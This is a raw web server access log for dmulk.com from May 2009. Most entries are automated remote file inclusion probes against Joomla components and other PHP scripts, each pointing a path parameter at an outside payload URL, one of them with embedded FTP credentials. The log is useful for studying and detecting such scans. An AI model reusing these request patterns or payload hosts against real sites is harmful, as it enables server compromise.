74.54.241.100 - - [05/May/2009:10:02:48 -0700] "GET /logs/access_080623.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.mjswimgear.dk/joomla/media/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:10:02:49 -0700] "GET /logs/access_080623.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.mjswimgear.dk/joomla/media/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.98.59.178 - - [05/May/2009:10:02:52 -0700] "GET /logs/access_081117.log//index2.php?mosConfig_absolute_path=http://h1.ripway.com/suka212/elsi.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
84.1.102.190 - - [05/May/2009:10:02:52 -0700] "GET /errors.php?error=http://usuarios.lycos.es/workink/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.1.102.190 - - [05/May/2009:10:02:52 -0700] "GET /logs//errors.php?error=http://usuarios.lycos.es/workink/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.1.102.190 - - [05/May/2009:10:02:53 -0700] "GET /logs/access_090214.log//errors.php?error=http://usuarios.lycos.es/workink/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:10:02:56 -0700] "GET /logs/access_080313.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:10:02:56 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:10:02:56 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.233.69.41 - - [05/May/2009:10:02:59 -0700] "GET /editsite.php?returnpath=http://stelsis.ru/templates/fxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.233.69.41 - - [05/May/2009:10:02:59 -0700] "GET /logs/editsite.php?returnpath=http://stelsis.ru/templates/fxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.233.69.41 - - [05/May/2009:10:02:59 -0700] "GET /logs/access_090302.log/editsite.php?returnpath=http://stelsis.ru/templates/fxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:10:03:26 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:10:03:26 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:10:03:31 -0700] "GET /logs/access_090415.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:10:03:50 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:10:03:50 -0700] "GET /logs/access_090403.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:10:03:50 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.226.153.1 - - [05/May/2009:10:03:54 -0700] "GET /logs/access_090220.log/src/index_overview.inc.php?config[path_src_include]=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.52.164.18 - - [05/May/2009:10:04:08 -0700] "GET /logs/access_081201.log%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=ftp://temuco:69336933.9.152.46/public_html/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.64.202.134 - - [05/May/2009:10:04:21 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.64.202.134 - - [05/May/2009:10:04:21 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.64.202.134 - - [05/May/2009:10:04:21 -0700] "GET /logs/access_090308.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.64.202.134 - - [05/May/2009:10:04:21 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.64.202.134 - - [05/May/2009:10:04:21 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.64.202.134 - - [05/May/2009:10:04:21 -0700] "GET /logs/access_090308.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.197.217.39 - - [05/May/2009:10:04:32 -0700] "GET /logs/access_081201.log%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=ftp://temuco:69336933@72.9.152.46/public_html/v6id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.64.202.134 - - [05/May/2009:10:04:32 -0700] "GET /logs/access_090221.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.98.59.178 - - [05/May/2009:10:04:32 -0700] "GET /logs/access_081104.log//index2.php?mosConfig_absolute_path=http://h1.ripway.com/suka212/idku.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.98.59.178 - - [05/May/2009:10:04:32 -0700] "GET /index2.php?mosConfig_absolute_path=http://h1.ripway.com/suka212/idku.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.98.59.178 - - [05/May/2009:10:04:32 -0700] "GET /logs//index2.php?mosConfig_absolute_path=http://h1.ripway.com/suka212/idku.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.64.202.134 - - [05/May/2009:10:04:34 -0700] "GET /logs/access_090221.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.98.59.178 - - [05/May/2009:10:04:34 -0700] "GET /logs/access_081104.log//index2.php?mosConfig_absolute_path=http://h1.ripway.com/windi212/idku.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.98.59.178 - - [05/May/2009:10:04:34 -0700] "GET /index2.php?mosConfig_absolute_path=http://h1.ripway.com/windi212/idku.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.98.59.178 - - [05/May/2009:10:04:34 -0700] "GET /logs//index2.php?mosConfig_absolute_path=http://h1.ripway.com/windi212/idku.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
200.93.147.154 - - [05/May/2009:10:04:37 -0700] "GET /logs/access_081117.log//index2.php?mosConfig_absolute_path=http://h1.ripway.com/yuni212/andri.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
84.54.137.9 - - [05/May/2009:10:04:45 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.54.137.9 - - [05/May/2009:10:04:45 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.54.137.9 - - [05/May/2009:10:04:45 -0700] "GET /logs/access_080621.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.226.153.1 - - [05/May/2009:10:04:51 -0700] "GET /logs/src/index_overview.inc.php?config[path_src_include]=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.226.153.1 - - [05/May/2009:10:04:52 -0700] "GET /src/index_overview.inc.php?config[path_src_include]=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.226.153.1 - - [05/May/2009:10:04:52 -0700] "GET /logs/access_090415.log/src/index_overview.inc.php?config[path_src_include]=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:10:04:55 -0700] "GET /logs/access_090415.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.54.137.9 - - [05/May/2009:10:04:58 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
86.122.170.50 - - [05/May/2009:10:05:04 -0700] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
86.122.170.50 - - [05/May/2009:10:05:04 -0700] "GET /logs/access_080212.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.1.102.190 - - [05/May/2009:10:05:07 -0700] "GET /logs/access_080412.log//modules/xfsection/modify.php?dir_module=http://usuarios.lycos.es/workink/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.1.102.190 - - [05/May/2009:10:05:07 -0700] "GET /modules/xfsection/modify.php?dir_module=http://usuarios.lycos.es/workink/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.1.102.190 - - [05/May/2009:10:05:08 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://usuarios.lycos.es/workink/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
86.122.170.50 - - [05/May/2009:10:05:09 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.1.102.190 - - [05/May/2009:10:05:09 -0700] "GET /logs/access_080427.log//modules/xfsection/modify.php?dir_module=http://usuarios.lycos.es/workink/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.226.153.1 - - [05/May/2009:10:05:10 -0700] "GET /logs/access.log/src/index_overview.inc.php?config[path_src_include]=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:10:05:11 -0700] "GET /logs/access_080807.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.mjswimgear.dk/joomla/media/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:10:05:16 -0700] "GET /logs/access_080807.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.mjswimgear.dk/joomla/media/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.101.209.162 - - [05/May/2009:10:05:32 -0700] "GET /logs/access_080131.log HTTP/1.1" 200 1033898 "-" "AISearchBot (Email: aisearchbot@gmail.com; If your web site doesn't want to be crawled, please send us a email.)" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:10:05:33 -0700] "GET /logs/access_080623.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.mjswimgear.dk/joomla/media/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:10:05:36 -0700] "GET /logs/access_080623.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.mjswimgear.dk/joomla/media/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.101.209.162 - - [05/May/2009:10:05:39 -0700] "GET /logs/access_080201.log HTTP/1.1" 200 859311 "-" "AISearchBot (Email: aisearchbot@gmail.com; If your web site doesn't want to be crawled, please send us a email.)" "www.dmulk.com"
84.54.137.9 - - [05/May/2009:10:06:09 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.54.137.9 - - [05/May/2009:10:06:09 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.54.137.9 - - [05/May/2009:10:06:09 -0700] "GET /logs/access_080621.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.54.137.9 - - [05/May/2009:10:06:12 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.151.161.240 - - [05/May/2009:10:06:16 -0700] "GET /logs/access_081008.log%20%20//index.php?DOCUMENT_ROOT=http://pallmall11.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.151.161.240 - - [05/May/2009:10:06:26 -0700] "GET /logs/access_080719.log%20%20//index.php?DOCUMENT_ROOT=http://pallmall11.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.204.145.214 - - [05/May/2009:10:06:34 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://designchambers.com.hk/components/com_plugins? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.dmulk.com"
210.68.188.206 - - [05/May/2009:10:06:58 -0700] "GET /logs/access_080609.log/main.php?id=http://backs.thewomanizer.net/remember.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
210.68.188.206 - - [05/May/2009:10:06:58 -0700] "GET /main.php?id=http://backs.thewomanizer.net/remember.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
210.68.188.206 - - [05/May/2009:10:06:58 -0700] "GET /logs/main.php?id=http://backs.thewomanizer.net/remember.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [05/May/2009:10:07:19 -0700] "GET /index2.php?mosConfig_absolute_path=http://h1.ripway.com/rina212/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.249.84.246 - - [05/May/2009:10:07:24 -0700] "GET //administrator/components/com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&export.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:10:07:35 -0700] "GET /logs/access_080227.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]]=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:10:07:35 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]]=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:10:07:35 -0700] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]]=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.249.84.246 - - [05/May/2009:10:07:45 -0700] "GET /logs///administrator/components/com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&export.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.233.69.41 - - [05/May/2009:10:07:48 -0700] "GET /logs/access_090302.log%20%20/editsite.php?returnpath=http://stelsis.ru/templates/fxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.249.84.246 - - [05/May/2009:10:07:50 -0700] "GET /logs/access_080519.log///administrator/components/com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&export.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.249.84.246 - - [05/May/2009:10:07:50 -0700] "GET /logs/access_080718.log///administrator/components/com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&export.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.64.202.134 - - [05/May/2009:10:07:54 -0700] "GET /logs/access_090308.log%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.64.202.134 - - [05/May/2009:10:07:59 -0700] "GET /logs/access_090221.log%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.54.137.9 - - [05/May/2009:10:08:01 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.54.137.9 - - [05/May/2009:10:08:01 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.54.137.9 - - [05/May/2009:10:08:01 -0700] "GET /logs/access_080621.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.54.137.9 - - [05/May/2009:10:08:14 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.64.202.134 - - [05/May/2009:10:08:29 -0700] "GET /logs/access_090308.log%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.19.241.61 - - [05/May/2009:10:08:31 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=ftp://temuco:69336933@72.9.152.46/public_html/v6id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
61.19.241.61 - - [05/May/2009:10:08:31 -0700] "GET /logs/access_081201.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=ftp://temuco:69336933@72.9.152.46/public_html/v6id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
61.19.241.61 - - [05/May/2009:10:08:31 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=ftp://temuco:69336933@72.9.152.46/public_html/v6id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.64.202.134 - - [05/May/2009:10:08:33 -0700] "GET /logs/access_090221.log%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.19.241.61 - - [05/May/2009:10:08:37 -0700] "GET /logs/access_090117.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=ftp://temuco:69336933@72.9.152.46/public_html/v6id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
86.122.170.50 - - [05/May/2009:10:08:41 -0700] "GET /logs/access_080212.log%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
86.122.170.50 - - [05/May/2009:10:08:48 -0700] "GET /logs/access_080402.log%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.171.225.234 - - [05/May/2009:10:08:57 -0700] "GET /logs/access_080514.log/squirrelcart/cart_content.php?cart_isp_root=http://www.ionthenet.co.kr/note_log/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.19.241.61 - - [05/May/2009:10:09:15 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=ftp://temuco:69336933@72.9.152.46/public_html/v6id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
61.19.241.61 - - [05/May/2009:10:09:15 -0700] "GET /logs/access_081201.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=ftp://temuco:69336933@72.9.152.46/public_html/v6id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
61.19.241.61 - - [05/May/2009:10:09:17 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=ftp://temuco:69336933@72.9.152.46/public_html/v6id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
61.19.241.61 - - [05/May/2009:10:09:22 -0700] "GET /logs/access_090117.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=ftp://temuco:69336933@72.9.152.46/public_html/v6id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
211.233.69.41 - - [05/May/2009:10:09:26 -0700] "GET /logs/access_090221.log%20%20/editsite.php?returnpath=http://stelsis.ru/templates/fxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:10:09:37 -0700] "GET /logs/access_080227.log%20%20/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]]=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.116.168.108 - - [05/May/2009:10:10:09 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.116.168.108 - - [05/May/2009:10:10:09 -0700] "GET /logs/access_081207.log/modules/My_eGallery/index.php?basepath=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.116.168.108 - - [05/May/2009:10:10:09 -0700] "GET /logs/access_080622.log/modules/My_eGallery/index.php?basepath=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.116.168.108 - - [05/May/2009:10:10:09 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.1.102.190 - - [05/May/2009:10:11:13 -0700] "GET /logs/access_080122.log%20//modules/xfsection/modify.php?dir_module=http://usuarios.lycos.es/workink/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:10:12:14 -0700] "GET /logs/access_080529.log%20%20/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]]=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
78.108.81.31 - - [05/May/2009:10:12:17 -0700] "GET /logs/access_081201.log%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=ftp://temuco:69336933@72.9.152.46/public_html/v6id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.dmulk.com"
218.27.203.107 - - [05/May/2009:10:13:10 -0700] "GET /logs/access_090126.log///?_SERVER[DOCUMENT_ROOT]=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [05/May/2009:10:13:10 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 200 98195 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [05/May/2009:10:13:13 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.157.4.41 - - [05/May/2009:10:13:14 -0700] "HEAD /blog/wp-cron.php?check=0e2d9f8f249ca15a02717d213606e9a2 HTTP/1.0" 200 0 "-" "WordPress/2.7.1" "dmulk.com"
64.157.4.41 - - [05/May/2009:10:13:28 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
122.116.178.20 - - [05/May/2009:10:13:49 -0700] "GET /logs/access_080622.log/modules/My_eGallery/index.php?basepath=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.116.178.20 - - [05/May/2009:10:13:49 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
